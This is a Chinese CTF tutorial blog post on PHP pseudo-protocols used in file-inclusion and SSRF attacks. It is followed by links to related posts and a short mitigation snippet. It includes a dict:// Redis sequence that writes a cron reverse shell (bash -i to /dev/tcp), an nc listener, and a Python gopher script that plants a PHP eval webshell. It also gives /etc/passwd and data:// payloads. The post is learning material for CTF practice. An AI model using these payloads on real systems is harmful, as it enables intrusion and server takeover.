CTF常用伪协议总结

已于 2022-02-26 21:16:13 修改
阅读量7.4k 收藏 92
点赞数 11
分类专栏: ctf总结 文章标签: php 安全 web安全
于 2022-02-26 21:15:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51735061/article/details/123156046
版权
本文详细介绍了PHP中的几种伪协议,如file:///、php://input、php://filter等,展示了它们在漏洞检测、getshell、源码查看和安全风险中的应用,同时提到了如何通过配置避免这些漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

PHP伪协议

  • file://协议

    用来读取本地的文件,当用于文件读取函数时可以用。

    常见检测是否存在漏洞写法:

    www.xxx.com/?file=file:///etc/passwd

    此协议不受allow_url_fopen,allow_url_include配置影响


  • php://input协议

    此协议一般用于输入getshell的代码。

    • 使用方法:

      在get处填上php://input如下

      www.xxx.xxx/?cmd=php://input

      然后用hackbar或者其他工具,postPHP代码进行检验,如

      <?php>phpinfo()?>

    此协议受allow_url_include配置影响


  • php://filter协议

    此协议一般用来查看源码

    一般用法如下

    www.xxx.xxx/?file=php://filter/read=covert,vase64-encode/resource=index.php

    出来的是base64码需要进行解码

    此协议不受allow_url_fopen,allow_url_include配置影响


  • data://协议

    需要allow_url_fopen,allow_url_include均为on

    这是一个输入流执行的协议,它可以向服务器输入数据,而服务器也会执行。常用代码如下:

    http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

    text/plain,表示的是文本

    text/plain;base64, 若纯文本没用可用base64编码

  • dict://协议

    与gopher协议一般都出现在ssrf协议中,用来探测端口的指纹信息。同时也可以用它来代替gopher协议进行ssrf攻击。

    常见用法:

    • 探测端口指纹

      192.168.0.0/?url=dict://192.168.0.0:6379

      以上为探测6379(redis)端口的开发

    • 反弹shell

      1、开启反弹shell的监听

      nc -l 9999

      2、依次执行下面的命令

      curl dict://192.168.0.119:6379/set:mars:"\n\n * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n\n"
      curl dict://192.168.0.119:6379/config:set:dir:/etc/
      curl dict://192.168.0.119:6379/config:set:dbfilename:crontab
      curl dict://192.168.0.119:6379/bgsave      *

      执行时,反弹shell的命令,也就是set:mars:xxx,会因为特殊字符的原因无法写入到目标的redis中,被被空格所分割导致出现一下情况:

      1584705879.520734 [0 172.17.0.1:44488] “set” “mars” “\n\n*” “" "” “" "” “root” “bash” “-i” “>&” “/dev/tcp/192.168.0.119/6789” "0>&1\n\n"

      我们会发现,命令被分割了,看表象感觉像是被空格分割了。此时将反弹shell的命令进行十六进制转换,变为:

      curl dict://192.168.0.119:6379/set:mars:"\x0a\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x72\x6f\x6f\x74\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x31\x39\x2f\x39\x39\x39\x39\x20\x30\x3e\x26\x31\x0a"

      以上单引号使用反斜杠\进行转移,其他数据进行十六进制编码,执行结果如下,可以发现没有错误了

      1584706087.980465 [0 172.17.0.1:44490] “set” “mars” "\n * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n"*

      剩下的修改路径和文件名称的请求,正常执行即可

  • gopher://协议

    gopher://协议经常用来打内网的各种应用如mysql redis等。一般要用一些工具来进行构造payload 如gopherus等

    之前用来打redis内网的脚本如下

    #!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib.request
from urllib.parse import quote

url = "http://192.168.239.78:41403/index.php?url="    #windows上搭建的ssrf漏洞页面
gopher = "gopher://0.0.0.0:6379/_" #/var/www/html
#auth nonono
# 攻击脚本
data = """
flushall
set test "\\n\\n<?php @eval($_POST[x]);?>\\n\\n"
config set dir /var/www/html
config set dbfilename shell.php
save
quit
"""
def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

print(encoder)
# 生成payload
payload = url + quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib.request.Request(payload)
response = urllib.request.urlopen(request).read()
print(response)

  • zip://协议

    zip://协议可以用来访问服务器中的压缩包,无论压缩包里面的文件是什么类型的都可以执行。也就是说如果服务器禁止我们上传php文件那么我们可以把php文件改后缀然后压缩再上传,然后用zip协议访问。要利用zip协议时一般要结合文件上传与文件包含两个漏洞

    一般的代码为

    www.xxx.xxx/?file=zip:///php.zip#phpinfo.jpg

    其中的#好表示的是php.zip的子文件名。有时候#需要变成==%23==,url编码。


  • compress.bzip2://协议

    与zip协议类似不过要压缩成bzip2格式的


  • compress.zlib://协议

    与zip协议类似不过要压缩成zlib格式的


  • phar://协议

    phar://协议与zip://协议类似,它也可以访问zip包,访问的格式与zip的不同,如下所示

    http://127.0.0.1/include.php?
file=phar:///phpinfo.zip/phpinfo.txt
#这里用/隔开了子文件
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
ctfphp伪协议的使用
一只菜鸟呀的博客
05-20 1759
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
CTF常用php伪协议总结
Y4tacker的博客
08-04 8292
文章目录总览file://php://php://filterphp://inputdata://参考文章 总览 php:// — 访问各个输入/输出流(I/O streams) file:// — 访问本地文件系统 phar:// — PHP 归档 zlib:// — 压缩流 data:// — 数据(RFC 2397) http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs glob:// — 查找匹配的文件路径模式 ssh2:// — Secure Shell
ctf文件包含+伪协议总结
limenzzz的博客
09-08 2640
基本原理
CTF学习 day3 PHP伪协议
m0_64140818的博客
04-18 234
解码后得到flag{de4c504e-e485-48b4-8c81-4e13941e3238}返回上一级发现php文件,考虑使用php伪协议。打开靶机网址我们发现是一个超链接,点进去。跳转后的页面也没有什么有用的信息。获得base64编码。
NSSCTF刷题笔记web3——[SWPUCTF 2021 新生赛]include
qq_45692883的博客
01-18 662
考点是,绕过php文件被包裹会当做后端语言执行,需要通过伪协议base64加密的方式提取出来。代码如上,没有做任何的过滤。
CTF-Web-常用伪协议用法:
半岛铁盒的博客
12-08 1296
常用伪协议用法: 1.php伪协议 用法 php://input,用于执行php代码,需要post请求提交数据。 php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php 需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp 不需要开启allow_url_fopen:php://filter 2.、data协议 用法: da
CTF--php伪协议结合Base64绕过
weixin_74020633的博客
11-20 1194
base64编码是一种只接受[A-Za-z0-9+/]的编码方式,也就是说base64只包含了64个可打印的字符,当需要编码的字符串中出现了这64个字符外的其他字符,在base64-decode时会被跳过,base64-decode仅仅会将可识别的字符编码后重新组成新的字符串。在ctf中,base64是比较常见的编码方式,在做题的时候发现自己对于base64的编码和解码规则不是很了解,并且恰好碰到了类似的题目,在翻阅了大佬的文章后记录一下,对于base64编码的学习和一个工具。
ctf常用PHP伪协议
weixin_35756637的博客
01-02 930
CTF比赛中,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议常用于在浏览器中执行PHP代码,例如:...
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 2333
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
CTF Web安全PHP弱类型与伪协议漏洞解析:CTF Web题型理论基础及绕过技巧总结
最新发布
05-13
内容概要:本文档主要介绍了CTF竞赛中Web题型的理论基础,涵盖PHP弱类型特性及其绕过技巧、常见PHP伪协议的应用场景及具体示例。PHP弱类型部分详细解释了“==”与“===”的区别,以及由此引发的各种绕过方法,如md5...
CTF-SHOW】Web入门 Web78 初学文件包含 WP【data 伪协议、filter 伪协议 和 日志包含攻击】
2302_79596028的博客
10-27 1050
CTF-SHOW】本文介绍了Web入门 Web78 的WP——关于data 伪协议、filter 伪协议 和 日志包含攻击】
CTF-WEB:PHP伪协议用法总结
weixin_59166557的博客
11-09 2940
PHP 中的一个虚拟协议(或称为流包装器),用于访问 PHP 内部流资源。它是 PHP 提供的内置流协议之一,允许你通过流(stream)方式访问 PHP 内部的数据流、文件或其他资源。与 等协议不同, 并不直接映射到文件系统,而是用于处理 PHP 特有的资源,如输入输出流、临时文件、PHP 自身的内存流等。 协议是 PHP 流包装器的一部分,允许在 PHP 脚本中灵活地处理不同类型的资源。 有多个子协议,它们提供不同的功能,常见的子协议有 、、 等。 是一个只读流,用于读取原始的 POST 数据。与
CTF-WEBPHP 伪协议
xv66666的博客
07-29 475
在 index.php 页面下有个 file 参数用于接收要包含的文件,设置之为 php://input 伪协议,用 post 传递要执行的 php 代码。对于变量 user,当传进去的变量的参数作为文件名变量去打开时,可用 php://input 作为参数,同时使用 post 方式传入内容作为变量的文件内容。当包含的文件在服务器本地时,就形成了本地文件包含。,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。
CTF中文件包含&伪协议
wikey 的博客
03-29 364
我们都知道require_once在调用时php会检查该文件是否已经被包含过,而这里在前面就已经包含了文件,我们在后面再想包含’flag.php’时就不能实现了,而我们需要做到就是怎么绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容。require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。因为 php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中。的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。
ctfphp伪协议,ctf中常见的php伪协议应用
weixin_39949776的博客
03-29 773
ctf中常见的php伪协议应用0x01 知识储备php支持的协议和封装协议可以看http://php.net/manual/zh/wrappers.php,大致有12种,总结了一些真实漏洞和ctf比赛中常出现的案例,发现其中用的最多的四种是:php://、data://、zlib://、phar://三个白帽payload:php://filter/write=convert.base64-dec...
ctf中关于php伪协议的考查
蚁景网安学院
09-04 352
1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinc...
ctf常见php,CTF中常见的PHP伪协议
weixin_32306771的博客
03-10 775
内容纲要一、PHP伪协议简介:PHP 支持的协议与封装协议。二、CTF中常见的PHP伪协议。file:// — 访问本地文件系统php:// — 访问各个输入/输出流(I/O streams)data:// — 数据(RFC 2397)glob:// — 查找匹配的文件路径模式三、PHP伪协议的利用。file://的利用对本地文件进行访问,eg:url?filepath=file:///c:/2、...
CTF】 文件包含漏洞——data伪协议 【详】
2302_79596028的博客
10-27 2918
本文详细介绍了在CTF比赛中关于文件包含漏洞的一种常用攻击方法——data伪协议
ctf web php 伪协议
01-08
### CTF Web 安全PHP 伪协议的利用与防护 #### PHP 伪协议概述 PHP 提供了一系列特殊的伪协议,如 `php://input`、`php://filter` 和 `data://` 等。这些伪协议可以用于读取、写入或执行代码,但在某些情况下也可能成为安全隐患[^1]。 #### 常见的伪协议及其用途 - **`php://input`**: 可以用来读取原始 POST 数据。 - **`php://filter`**: 支持对流进行过滤操作,常用于编码转换或数据处理。 - **`data://`**: 允许直接嵌入数据作为输入源。 在 CTF 中,攻击者可能会利用这些特性来绕过文件包含限制或其他安全机制。例如,通过构造特定 URL 或参数传递给存在漏洞的应用程序,从而触发未预期的行为。 #### 防护措施 为了避免因使用上述伪协议而导致的安全风险,可以从以下几个方面着手: ##### 修改配置文件 最直接的方法是在服务器端全局禁用潜在危险的功能。这可以通过编辑 `php.ini` 文件并调整相应选项完成。具体来说,关闭不必要的模块和服务能够显著降低受攻击面。 ```ini allow_url_fopen = Off allow_url_include = Off ``` ##### 动态设置运行时指令 对于无法更改全局配置的情况,则可以在应用程序内部采用编程方式临时改变环境变量。借助于内置函数 `ini_set()` 实现这一点同样有效。 ```php <?php // 关闭远程文件包含功能 ini_set('allow_url_include', '0'); ?> ``` ##### 输入验证与清理 无论何时接收外部输入都应保持警惕心,尤其是当涉及到路径名解析的时候更需谨慎对待。确保所有传入的数据经过严格校验后再进一步处理;必要时还可以考虑引入黑名单/白名单策略加以辅助控制[^3]。 ##### 使用现代框架和库 许多流行的开发工具包已经内置了针对此类威胁的有效防范手段。积极选用那些具有良好口碑且持续更新维护的产品有助于减轻开发者负担的同时提高整体安全性水平。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值